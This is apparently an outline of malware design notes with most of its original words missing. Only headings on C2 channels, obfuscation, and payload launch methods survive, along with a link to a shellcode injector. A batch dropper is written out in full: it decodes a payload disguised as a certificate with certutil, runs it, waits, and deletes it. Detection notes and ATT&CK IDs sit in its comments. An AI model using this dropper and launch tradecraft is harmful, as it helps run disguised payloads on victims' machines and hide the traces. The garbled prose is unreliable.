  

1.    
-      . : HTTPS, DNS, ICMP
-   
-   (      - ,     )
-          ()
-   ,      
-    .  ,  json/xml/ -    ,    
-  .   


2.  (stateless-)
-        , ID,   ,   , 
     "" -    ,     ,
     ,       .
-      -   ,     .
:     ,      ,      .
 ,   -   ,   ,       .


3. 
-    
-     .
,    ,    :

 @echo off
 REM Purpose: decode an encoded file, run the result, wait, then try to delete it.
 REM certutil -decode converts the Base64 content of file.crt into file.exe.
 REM NOTE(review): the .crt name presumably makes the payload look like a certificate - confirm.
 REM Detection: certutil.exe run with -decode and an executable as output
 REM (MITRE ATT&CK T1140), especially when spawned by cmd.exe from a script.
 certutil -decode file.crt file.exe
 REM Runs the decoded binary. Detection: a process started from a file that
 REM certutil.exe wrote moments earlier.
 file.exe
 REM Uses ping as a timer: 300 echo requests to loopback take roughly five minutes,
 REM with output discarded. Detection: ping to 127.0.0.1 with a large -n in a script.
 ping -n 300 127.0.0.1 > NUL
 REM Cleanup attempt (MITRE ATT&CK T1070.004). /f forces deletion of read-only files.
 REM NOTE(review): /y is not among the documented del switches, so this step may fail
 REM and leave file.exe on disk - responders should still look for it and for file.crt.
 del /f /y file.exe

          ,     .
     ,    -      ,    .
-       

4.  
      .
-     ,   
-    -,    - XOR   XOR 1 .
-     ,        
-   
-   ,   ,  ,      
-  ,     (   )
-   LLVM-  

5. 
-   ,  .     
-  cmd- ()
-  powershell- ()
-   shell- https://github.com/DimopoulosElias/SimpleShellcodeInjector/blob/master/SimpleShellcodeInjector.c
-  .exe- ()
-  .dll (rundll, regsvr) 

6.  
-       ,        

7. 
-    

